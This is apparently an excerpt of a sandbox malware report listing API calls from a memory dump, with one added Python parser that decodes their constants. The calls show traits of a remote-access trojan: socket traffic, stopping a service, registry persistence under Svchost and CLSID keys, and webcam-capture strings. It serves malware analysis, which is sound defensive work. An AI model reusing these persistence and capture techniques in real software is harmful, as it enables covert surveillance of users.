                                                                                    • API String ID: 3848672818-0
                                                                                    • Opcode ID: dfe70f22b2a35c70e1c8fc053d3368c4d0d293a002dc81a1411b13d209169f4c
                                                                                    • Instruction ID: f741cb1fc508fa1555a4d80f57bd3a4731466319d2c4703c3e5ad1f3d7aece7e
                                                                                    • Opcode Fuzzy Hash: dfe70f22b2a35c70e1c8fc053d3368c4d0d293a002dc81a1411b13d209169f4c
                                                                                    • Instruction Fuzzy Hash: DA11D632300205ABD7005A25D908BBA7B6AEFC8752F11C42EFD09DB194DF7AE95296A0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • setsockopt.WS2_32(?,0000FFFF,00007010,?,00000004), ref: 04ED347C
                                                                                    • EnterCriticalSection.KERNEL32(00000054), ref: 04ED348D
                                                                                    • LeaveCriticalSection.KERNEL32(00000054), ref: 04ED349A
                                                                                      • Part of subcall function 04ED2560: EnterCriticalSection.KERNEL32(00000054,?,?,00000000,00000000), ref: 04ED2599
                                                                                      • Part of subcall function 04ED2560: EnterCriticalSection.KERNEL32(-0000006C), ref: 04ED259F
                                                                                    • SetLastError.KERNEL32(00000000), ref: 04ED34A4
                                                                                    • LeaveCriticalSection.KERNEL32(00000054), ref: 04ED34B9
                                                                                    • HeapFree.KERNEL32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 04ED350E
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$Enter$Leave$ErrorFreeHeapLastsetsockopt
                                                                                    • String ID:
                                                                                    • API String ID: 773220702-0
                                                                                    • Opcode ID: a8a11c6fe38fc803067c86f3c4e5f89765c4515d17637fdd4f69b83500cde016
                                                                                    • Instruction ID: 911c2e2683220ec0a8341ec6b0ba986a01a97e5058ba24c2c41c4ff333ebc924
                                                                                    • Opcode Fuzzy Hash: a8a11c6fe38fc803067c86f3c4e5f89765c4515d17637fdd4f69b83500cde016
                                                                                    • Instruction Fuzzy Hash: 9E21A175A00208EBDB10DFA5DC84FAEBBB9FF88315F10405AFD06A7284CB75A905CB61
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • Sleep.KERNEL32(00000064), ref: 04EC3FD2
                                                                                    • PeekNamedPipe.KERNEL32(?,?,00000400,?,?,00000000), ref: 04EC3FF1
                                                                                    • LocalAlloc.KERNEL32(00000040,?), ref: 04EC4004
                                                                                    • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 04EC401B
                                                                                    • LocalFree.KERNEL32(00000000,?,?,0000003F,?,?,?,?,?,?,?,00000000), ref: 04EC4051
                                                                                    • PeekNamedPipe.KERNEL32(?,?,00000400,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 04EC4084
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: LocalNamedPeekPipe$AllocFileFreeReadSleep
                                                                                    • String ID:
                                                                                    • API String ID: 2866027955-0
                                                                                    • Opcode ID: 3ed70c8bcd6c6bbbb15fa9698305f532b67cf64f2316bc96d79b5abad47c88e2
                                                                                    • Instruction ID: 2d0b671e455b06cb2200ac682d879be8be25b7dbc4c308cc857c93b5654795d2
                                                                                    • Opcode Fuzzy Hash: 3ed70c8bcd6c6bbbb15fa9698305f532b67cf64f2316bc96d79b5abad47c88e2
                                                                                    • Instruction Fuzzy Hash: 7B21E672204301AFE710DF55DC85EABB7E9FB88705F50492DFAA1C2194DB70E909CB66
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,04ED3414,00000000,?,?,04ED31A8,?,?,?,?,00000000), ref: 04ED1DAD
                                                                                    • EnterCriticalSection.KERNEL32(0000006C,?,00000000,?,?,?,04ED3414,00000000,?,?,04ED31A8,?,?,?,?,00000000), ref: 04ED1DEB
                                                                                    • SetLastError.KERNEL32(00000000,?,04ED3414,00000000,?,?,04ED31A8,?,?,?,?,00000000), ref: 04ED1DFC
                                                                                    • LeaveCriticalSection.KERNEL32(0000006C,?,04ED3414,00000000,?,?,04ED31A8,?,?,?,?,00000000), ref: 04ED1E19
                                                                                    • InterlockedDecrement.KERNEL32(00000028), ref: 04ED1E26
                                                                                    • HeapFree.KERNEL32(?,00000000,00000000,00000000,?,04ED3414,00000000,?,?,04ED31A8,?,?,?,?,00000000), ref: 04ED1E47
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalErrorLastSection$DecrementEnterFreeHeapInterlockedLeave
                                                                                    • String ID:
                                                                                    • API String ID: 2534375417-0
                                                                                    • Opcode ID: 6930aa96769ef4909598809d3371fd40a00f629354ba0992de17e0392f07b406
                                                                                    • Instruction ID: 28a47d888c7e034ed8d133f88a0cc45d3c679cb1b8ee0bcb1595daaacea05647
                                                                                    • Opcode Fuzzy Hash: 6930aa96769ef4909598809d3371fd40a00f629354ba0992de17e0392f07b406
                                                                                    • Instruction Fuzzy Hash: 96213835600105EFDB108F65D848FAABBB9FF88306F04816AFD0697650DB32ED52DBA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 04ECE335
                                                                                    • SetLastError.KERNEL32(0000139F,?,00000000,04EB8415,74E5F5E0,00000004,80004005,80004005,80004005,80004005,80004005,?,04EB87E8,04EB8B5E,00000000,?), ref: 04ECE419
                                                                                      • Part of subcall function 04ECE8D0: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 04ECE8E5
                                                                                      • Part of subcall function 04ECE8D0: SwitchToThread.KERNEL32(?,?,00000000,04ECE352,?,00000000,04EB8415,74E5F5E0,00000004,80004005,80004005,80004005,80004005,80004005,?,04EB87E8), ref: 04ECE8FD
                                                                                      • Part of subcall function 04ECE500: SetEvent.KERNEL32(?,?,04EB8B5E,04EFD024,?), ref: 04ECE527
                                                                                      • Part of subcall function 04ECE500: CloseHandle.KERNEL32(00000000,?,04EB8B5E,04EFD024,?), ref: 04ECE54A
                                                                                    • send.WS2_32(?,04EFE6E0,00000010,00000000), ref: 04ECE397
                                                                                    • WSACloseEvent.WS2_32(00000000), ref: 04ECE3C2
                                                                                    • shutdown.WS2_32(?,00000001), ref: 04ECE3DA
                                                                                    • closesocket.WS2_32(?), ref: 04ECE3E3
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseEventThread$CompareCurrentErrorExchangeHandleInterlockedLastSwitchclosesocketsendshutdown
                                                                                    • String ID:
                                                                                    • API String ID: 4222243704-0
                                                                                    • Opcode ID: 7fe98ec9e32b6453175f9d6b8fa6fb33bfa35de6f6a24f0633f8fbfa771ca62e
                                                                                    • Instruction ID: 956e5a51d6313f8d147e4de369e75da19e388168863367de840882c417d679c8
                                                                                    • Opcode Fuzzy Hash: 7fe98ec9e32b6453175f9d6b8fa6fb33bfa35de6f6a24f0633f8fbfa771ca62e
                                                                                    • Instruction Fuzzy Hash: 72211270300602ABD7149F29D84CBA9BBA6FF84316F144659E519876D0CB75F8A6CFD0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 04EC37BE
                                                                                    • OpenServiceW.ADVAPI32(00000000,?,00000024), ref: 04EC37CE
                                                                                    • QueryServiceStatus.ADVAPI32(00000000,?,?,00000024), ref: 04EC37DF
                                                                                    • ControlService.ADVAPI32(00000000,00000001,?,?,00000024), ref: 04EC37FD
                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,00000024), ref: 04EC380E
                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,00000024), ref: 04EC3815
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Service$CloseHandleOpen$ControlManagerQueryStatus
                                                                                    • String ID:
                                                                                    • API String ID: 3062456870-0
                                                                                    • Opcode ID: a2fba87644436c4ecd1f3560012b152038327098de31d8a9693df5c2ede2ec03
                                                                                    • Instruction ID: 1379e42dd8c4f89b3ddea4404c5444c4c89c471cd1f9c974f723ed3f903574c2
                                                                                    • Opcode Fuzzy Hash: a2fba87644436c4ecd1f3560012b152038327098de31d8a9693df5c2ede2ec03
                                                                                    • Instruction Fuzzy Hash: BE019636701214ABD7209B669D48EBBB7BCEB89B52F00502EFD05D2145DE78DC058760
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%
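Reading these blocks by hand means decoding the hex arguments the sandbox recovered at each call site, for example the `000F003F` access mask passed to `OpenSCManagerW`, the `00000024` passed to `OpenServiceW`, the `00000001` control code passed to `ControlService` in the block above, or the `00000023` event mask passed to `WSAEventSelect` and the `0000FFFF`/`00007010` pair passed to `setsockopt` in the earlier blocks. The following parser is an added example for working with this listing format; it is not part of the report and not Joe Sandbox code. It parses the `Func.MODULE(args), ref: ADDR` lines (including the indented `Part of subcall function` lines and the lines where no argument list was recovered), decodes the arguments against the documented Win32/Winsock constant values, and counts direct calls per DLL. The `SAMPLE` input is constructed from listing lines copied from the blocks on this page; the constant tables cover only the values that appear here plus a few common neighbours.

```python
"""Parse a Joe Sandbox "APIs" listing and decode the hex constants the sandbox recovered
for each call. Added example for reading the blocks above; not part of the report and
not Joe Sandbox code. Constant tables hold documented Win32/Winsock values."""
import re
from collections import Counter
from dataclasses import dataclass
from typing import Optional

# Listing line: optional "Part of subcall function X:" prefix, then Func.MODULE(args), ref: ADDR.
# The argument list is absent when the sandbox recovered none (e.g. "timeGetTime.WINMM ref: ...").
LINE_RE = re.compile(r"•\s*(?:Part of subcall function (?P<subfn>[0-9A-Fa-f]+):\s*)?"
                     r"(?P<func>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\),)?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")

@dataclass
class ApiCall:
    func: str
    module: str
    args: list                 # int per recovered hex argument, None for '?'
    ref: int                   # call-site address in the dump
    subcall_of: Optional[int]  # parent function for "Part of subcall" lines, else None

def parse_listing(text: str) -> list:
    """Return ApiCall records for the call lines; headers and hash lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        raw = m.group("args")
        args = [] if raw is None else [None if a == "?" else int(a, 16) for a in raw.split(",")]
        sub = int(m.group("subfn"), 16) if m.group("subfn") else None
        calls.append(ApiCall(m.group("func"), m.group("mod"), args, int(m.group("ref"), 16), sub))
    return calls

SOL_SOCKET = 0xFFFF
SOCKOPT = {0x0004: "SO_REUSEADDR", 0x0008: "SO_KEEPALIVE", 0x0080: "SO_LINGER", 0x1001: "SO_SNDBUF",
           0x1002: "SO_RCVBUF", 0x700B: "SO_UPDATE_ACCEPT_CONTEXT", 0x7010: "SO_UPDATE_CONNECT_CONTEXT"}
FD_EVENTS = {0x01: "FD_READ", 0x02: "FD_WRITE", 0x04: "FD_OOB", 0x08: "FD_ACCEPT", 0x10: "FD_CONNECT", 0x20: "FD_CLOSE"}
SERVICE_ACCESS = {0x01: "SERVICE_QUERY_CONFIG", 0x02: "SERVICE_CHANGE_CONFIG", 0x04: "SERVICE_QUERY_STATUS",
                  0x08: "SERVICE_ENUMERATE_DEPENDENTS", 0x10: "SERVICE_START", 0x20: "SERVICE_STOP",
                  0x40: "SERVICE_PAUSE_CONTINUE", 0x80: "SERVICE_INTERROGATE", 0x100: "SERVICE_USER_DEFINED_CONTROL"}
SERVICE_CONTROL = {1: "SERVICE_CONTROL_STOP", 2: "SERVICE_CONTROL_PAUSE", 3: "SERVICE_CONTROL_CONTINUE",
                   4: "SERVICE_CONTROL_INTERROGATE"}
SHUTDOWN_HOW = {0: "SD_RECEIVE", 1: "SD_SEND", 2: "SD_BOTH"}
WIN32_ERR = {0x57: "ERROR_INVALID_PARAMETER", 0x139F: "ERROR_INVALID_STATE"}
NTSTATUS = {0xC0000005: "STATUS_ACCESS_VIOLATION", 0xC000001D: "STATUS_ILLEGAL_INSTRUCTION"}
ENUMS = {"ControlService": (1, SERVICE_CONTROL), "shutdown": (1, SHUTDOWN_HOW),   # func -> (arg index, names)
         "SetLastError": (0, WIN32_ERR), "RaiseException": (0, NTSTATUS)}
MASKS = {"WSAEventSelect": (2, FD_EVENTS), "OpenServiceW": (2, SERVICE_ACCESS)}  # bit-mask arguments

def flags(value: int, table: dict) -> list:
    # Expand a bit mask into flag names, lowest bit first; bits outside the table are kept as hex.
    names = [name for bit, name in sorted(table.items()) if value & bit]
    rest = value & ~sum(table)
    return names + ([hex(rest)] if rest else [])

def describe(call: ApiCall) -> str:
    """One-line reading of a call with its constants decoded; falls back to Func.MODULE."""
    a, f = call.args + [None] * 3, call.func   # pad so positional lookups never raise
    if f in ENUMS and a[ENUMS[f][0]] in ENUMS[f][1]:
        return f"{f} {ENUMS[f][1][a[ENUMS[f][0]]]}"
    if f in MASKS and a[MASKS[f][0]] is not None:
        return f"{f} " + "|".join(flags(a[MASKS[f][0]], MASKS[f][1]))
    if f in ("getsockopt", "setsockopt") and a[1] == SOL_SOCKET and a[2] is not None:
        return f"{f} SOL_SOCKET/{SOCKOPT.get(a[2], hex(a[2]))}"
    if f == "OpenSCManagerW" and a[2] == 0xF003F:
        return "OpenSCManagerW SC_MANAGER_ALL_ACCESS"
    if f == "Sleep" and a[0] is not None:
        return f"Sleep {a[0]} ms"
    return f"{f}.{call.module}"

def top_level(calls: list) -> list:
    # Calls made by the function itself, without the inlined "Part of subcall" lines.
    return [c for c in calls if c.subcall_of is None]

def modules(calls: list) -> Counter:
    # Direct calls per DLL: a quick read of what a function block is for.
    return Counter(c.module for c in top_level(calls))

# Constructed input: listing lines copied from the function blocks on this page.
SAMPLE = """\
APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 04EC37BE
• OpenServiceW.ADVAPI32(00000000,?,00000024), ref: 04EC37CE
• QueryServiceStatus.ADVAPI32(00000000,?,?,00000024), ref: 04EC37DF
• ControlService.ADVAPI32(00000000,00000001,?,?,00000024), ref: 04EC37FD
• CloseServiceHandle.ADVAPI32(00000000,?,00000024), ref: 04EC380E
• CloseServiceHandle.ADVAPI32(00000000,?,00000024), ref: 04EC3815
• Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
• WSAEventSelect.WS2_32(?,?,00000023), ref: 04ECDF18
• send.WS2_32(?,00000000,00000000,00000000), ref: 04ECDF73
• setsockopt.WS2_32(?,0000FFFF,00007010,?,00000004), ref: 04ED347C
  • Part of subcall function 04ED2560: EnterCriticalSection.KERNEL32(00000054,?,?,00000000,00000000), ref: 04ED2599
  • Part of subcall function 04ED2560: EnterCriticalSection.KERNEL32(-0000006C), ref: 04ED259F
• SetLastError.KERNEL32(0000139F,?,?,04EB83CB,80004005,?,04EB87E8,04EB8B5E,00000000,?), ref: 04ECF6DF
• shutdown.WS2_32(?,00000001), ref: 04ECE3DA
• Sleep.KERNEL32(00000064), ref: 04EC3FD2
• timeGetTime.WINMM ref: 04ED3545
"""

if __name__ == "__main__":
    for c in parse_listing(SAMPLE):
        print(("    " if c.subcall_of else "") + f"{c.ref:08X}  {describe(c)}")
    print(dict(modules(parse_listing(SAMPLE))))
```

Run as a script it prints one decoded line per call, indented for subcall lines, followed by the per-DLL count. On the service block the decoded sequence reads `OpenSCManagerW SC_MANAGER_ALL_ACCESS`, `OpenServiceW SERVICE_QUERY_STATUS|SERVICE_STOP`, `QueryServiceStatus`, `ControlService SERVICE_CONTROL_STOP`, which is the standard query-then-stop pattern; the service name itself is a `?` in the listing, so the parser leaves it as `None` rather than guessing. Arguments the sandbox infers from stack slots are heuristic, so treat a decoded name as a lead to confirm in the disassembly, not as ground truth.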

                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(?,00000000,04EDEBF2,00000000,00000002,?,04EDF853,04EE05A6,00000000,?,00000002), ref: 04EE85E0
                                                                                    • _free.LIBCMT ref: 04EE8613
                                                                                    • _free.LIBCMT ref: 04EE863B
                                                                                    • SetLastError.KERNEL32(00000000,00000000,?,00000002,?,?,?,?,?,04EE05A6,00000000,?,04EC703A,00000002), ref: 04EE8648
                                                                                    • SetLastError.KERNEL32(00000000,00000000,?,00000002,?,?,?,?,?,04EE05A6,00000000,?,04EC703A,00000002), ref: 04EE8654
                                                                                    • _abort.LIBCMT ref: 04EE865A
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$_free$_abort
                                                                                    • String ID:
                                                                                    • API String ID: 3160817290-0
                                                                                    • Opcode ID: 94fd6e6d9c8afea0724dbce5ac2ef0c45269658ca4ac45699da8ee168098e1f5
                                                                                    • Instruction ID: ddb38e88b0f2ddbec1f1676d1cc00ccdc30950b127de4904648dfa165b88b5ec
                                                                                    • Opcode Fuzzy Hash: 94fd6e6d9c8afea0724dbce5ac2ef0c45269658ca4ac45699da8ee168098e1f5
                                                                                    • Instruction Fuzzy Hash: FAF0A435200902A7E3127737BD08A7E262AFFC166DF21AD16FC19E32A0EE26E9014125
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • InterlockedExchange.KERNEL32(?,00000000), ref: 04EC1B87
                                                                                    • InterlockedExchange.KERNEL32(?,00000000), ref: 04EC1B8F
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,?,04EB9635,?,Function_000568D8,00000000), ref: 04EC1B96
                                                                                    • CloseHandle.KERNEL32(?,?,00000000,?,04EB9635,?,Function_000568D8,00000000), ref: 04EC1B9F
                                                                                    • DestroyCursor.USER32(?), ref: 04EC1BC6
                                                                                    • CloseHandle.KERNEL32(?,?,00000000,?,04EB9635,?,Function_000568D8,00000000), ref: 04EC1BDD
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseExchangeHandleInterlocked$CursorDestroyObjectSingleWait
                                                                                    • String ID:
                                                                                    • API String ID: 1528086460-0
                                                                                    • Opcode ID: 46c0788991aeb6df60c2dfc70ce6a1fdeb6187f053009089690012a890631572
                                                                                    • Instruction ID: ff788133ed2456875e8ee518ec9f6358e37f310adc9c4283466cd9abbc217ea6
                                                                                    • Opcode Fuzzy Hash: 46c0788991aeb6df60c2dfc70ce6a1fdeb6187f053009089690012a890631572
                                                                                    • Instruction Fuzzy Hash: BA017C75600210DFDF118F51DD89B867FB9EF49315F004196EE1A9B25ADB71E800CF62
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                      • Part of subcall function 04EB2F60: CoCreateInstance.OLE32(Function_00046FD0,00000000,00000001,04EF7070,00000000,?,?,?,?,?,?,04EB295F,?,?), ref: 04EB2F9A
                                                                                      • Part of subcall function 04EB2F60: SysFreeString.OLEAUT32(04EB295F), ref: 04EB3040
                                                                                    • CoCreateInstance.OLE32(04EF7060,00000000,00000001,04EF7050,?), ref: 04EB29B3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateInstance$FreeString
                                                                                    • String ID: Capture Filter$Grabber$vids
                                                                                    • API String ID: 308859552-3946229282
                                                                                    • Opcode ID: 385500b1807164b2a2badfb53452beaa18e7e42d9657b63a630ea8f4b65dd4a7
                                                                                    • Instruction ID: 31dd667e7d623a593f2451fce1c2fdc96547c1d0815f61dc6d02d9f06bac52c3
                                                                                    • Opcode Fuzzy Hash: 385500b1807164b2a2badfb53452beaa18e7e42d9657b63a630ea8f4b65dd4a7
                                                                                    • Instruction Fuzzy Hash: 23C12A70A00255AFDB24CF64CC84FAAB7B5BF48704F1095D9EA49AB250DB71F985CFA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                      • Part of subcall function 04ECA980: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 04ECA9BE
                                                                                      • Part of subcall function 04ECA980: CheckTokenMembership.ADVAPI32(00000000,?,00000000), ref: 04ECA9D1
                                                                                      • Part of subcall function 04ECA980: FreeSid.ADVAPI32(?), ref: 04ECA9DA
                                                                                    • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Classes\.codein,00000000,00020119,04ECB38C,?,04F05318,?,?,04ECB38C), ref: 04EB6350
                                                                                    • RegCloseKey.ADVAPI32(04ECB38C,?,04F05318,?,?,04ECB38C), ref: 04EB635D
                                                                                      • Part of subcall function 04EC6C30: wsprintfW.USER32 ref: 04EC6C78
                                                                                      • Part of subcall function 04EC6C30: RegOpenKeyExW.KERNEL32(80000002,?,00000000,00020119,?), ref: 04EC6CB5
                                                                                      • Part of subcall function 04EC6C30: RegQueryValueExW.ADVAPI32(?,04EFD09C,00000000,?,?,?), ref: 04EC6CE0
                                                                                      • Part of subcall function 04EC6C30: RegCloseKey.ADVAPI32(?), ref: 04EC6CF6
                                                                                      • Part of subcall function 04EC6B30: wsprintfW.USER32 ref: 04EC6B75
                                                                                      • Part of subcall function 04EC6B30: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?), ref: 04EC6BB2
                                                                                      • Part of subcall function 04EC6B30: RegQueryValueExW.ADVAPI32(?,04EFD09C,00000000,?,?,?), ref: 04EC6BDD
                                                                                      • Part of subcall function 04EC6B30: RegCloseKey.ADVAPI32(?), ref: 04EC6BF3
                                                                                    • RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Classes\.codein,00000000,00020119,?,?,04F05318,?,?,04ECB38C), ref: 04EB6386
                                                                                    • RegCloseKey.ADVAPI32(?,?,04F05318,?,?,04ECB38C), ref: 04EB6393
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseOpen$QueryValuewsprintf$AllocateCheckFreeInitializeMembershipToken
                                                                                    • String ID: SOFTWARE\Classes\.codein
                                                                                    • API String ID: 2055797972-3041101089
                                                                                    • Opcode ID: 2436f8e634cf4d2509004b7202982b07fd1d14fe1c6c1d0151674edd9d70c1fc
                                                                                    • Instruction ID: 88c785f334d598e988e7d6c04e78757c26ae7bbce85e8cb4679352088843d210
                                                                                    • Opcode Fuzzy Hash: 2436f8e634cf4d2509004b7202982b07fd1d14fe1c6c1d0151674edd9d70c1fc
                                                                                    • Instruction Fuzzy Hash: 8C21E4706003049BE710AF74E945BABBBE4FF44308F10226DED86D6651EBB1F8918B81
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                      • Part of subcall function 04EC6010: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,00000378), ref: 04EC61B1
                                                                                      • Part of subcall function 04EC6010: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 04EC61DF
                                                                                      • Part of subcall function 04EC6010: RegCloseKey.ADVAPI32(?), ref: 04EC61F5
                                                                                    • wsprintfW.USER32 ref: 04EB78CF
                                                                                    • RegCreateKeyExW.ADVAPI32(80000002,?,00000000,00000000,00000000,000F013F,00000000,?,00000000), ref: 04EB7909
                                                                                    • RegSetValueExW.ADVAPI32(?,04EFD09C,00000000,00000004,?,00000004), ref: 04EB792A
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 04EB7940
                                                                                    Strings
                                                                                    • SOFTWARE\Classes\CLSID\%s, xrefs: 04EB78C9
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseValue$CreateOpenQuerywsprintf
                                                                                    • String ID: SOFTWARE\Classes\CLSID\%s
                                                                                    • API String ID: 73588525-1183003970
                                                                                    • Opcode ID: e7c42a0fa67dcfcb811983083810569a67c3d7de707df759255d71bde0721895
                                                                                    • Instruction ID: d29c76dab618da1eb5835b839c5a5eed156442f00692745b8e180f44aedee2ba
                                                                                    • Opcode Fuzzy Hash: e7c42a0fa67dcfcb811983083810569a67c3d7de707df759255d71bde0721895
                                                                                    • Instruction Fuzzy Hash: 7D116071A0122CABDB20DBA5AC49EEFBBBCEF85711F0001A6AD0DE6144D6755E44DBD0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetDesktopWindow.USER32 ref: 04EC2278
                                                                                    • MonitorFromWindow.USER32(00000000,00000002), ref: 04EC2281
                                                                                    • GetMonitorInfoW.USER32 ref: 04EC2295
                                                                                    • EnumDisplaySettingsW.USER32 ref: 04EC22BA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: MonitorWindow$DesktopDisplayEnumFromInfoSettings
                                                                                    • String ID: h
                                                                                    • API String ID: 1862586070-2439710439
                                                                                    • Opcode ID: 086dc99ce3208b6c910004712249bffb468f2db3716163e91c006091e081780c
                                                                                    • Instruction ID: a3fc11b91645467819e630dd89d977235f040a2b3088aaa0cca7166f5c5b222b
                                                                                    • Opcode Fuzzy Hash: 086dc99ce3208b6c910004712249bffb468f2db3716163e91c006091e081780c
                                                                                    • Instruction Fuzzy Hash: 8B21D131504745DFD720DF78E845AAAB3A9FFC8366F00471EE85997281DB30A815CB92
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost,00000000,00020019,00000000,?,?,?,?,00000000,00000000,00000000,00000000), ref: 04ECA0FC
                                                                                    • RegQueryValueExW.ADVAPI32(00000000,AppService,00000000,00000000,?,00000104,?,?,?,?,00000000,00000000,00000000,00000000), ref: 04ECA115
                                                                                    • RegCloseKey.ADVAPI32(00000000,?,?,?,?,00000000,00000000,00000000,00000000), ref: 04ECA128
                                                                                    Strings
                                                                                    • SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost, xrefs: 04ECA0F2
                                                                                    • AppService, xrefs: 04ECA10D
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseOpenQueryValue
                                                                                    • String ID: AppService$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost
                                                                                    • API String ID: 3677997916-1367592619
                                                                                    • Opcode ID: a3fd940262b7f965c1f273c8c407f8f46bbab45199be6978fd8b33c2776f9f5b
                                                                                    • Instruction ID: 4929444506f61425941645f77060e989e8d56e1cfec6d9b1430376d05f405fbb
                                                                                    • Opcode Fuzzy Hash: a3fd940262b7f965c1f273c8c407f8f46bbab45199be6978fd8b33c2776f9f5b
                                                                                    • Instruction Fuzzy Hash: 5D01B572740208BFF7205E99BD86FBAB7BCDB84719F10107EFE48D2140E6A66D115A61
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,04EC8032), ref: 04EB250B
                                                                                    • CreateWindowExA.USER32 ref: 04EB253C
                                                                                    • CloseHandle.KERNEL32(?), ref: 04EB255E
                                                                                    • CloseWindow.USER32 ref: 04EB2579
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseCreateWindow$EventHandle
                                                                                    • String ID: #32770
                                                                                    • API String ID: 1958951703-463685578
                                                                                    • Opcode ID: 74e1a3474e239d9c710393e67fe12d99f469c381f9b235be8292a70a680aa254
                                                                                    • Instruction ID: b00f1c793c8abf0be32f5fc984d80f2623a468289b10ccefb188e70fc06dea36
                                                                                    • Opcode Fuzzy Hash: 74e1a3474e239d9c710393e67fe12d99f469c381f9b235be8292a70a680aa254
                                                                                    • Instruction Fuzzy Hash: C6F0F970642701ABF7319B75AC19F877AE4FF00705F104669FA59EB2C4DBB4F8018A91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
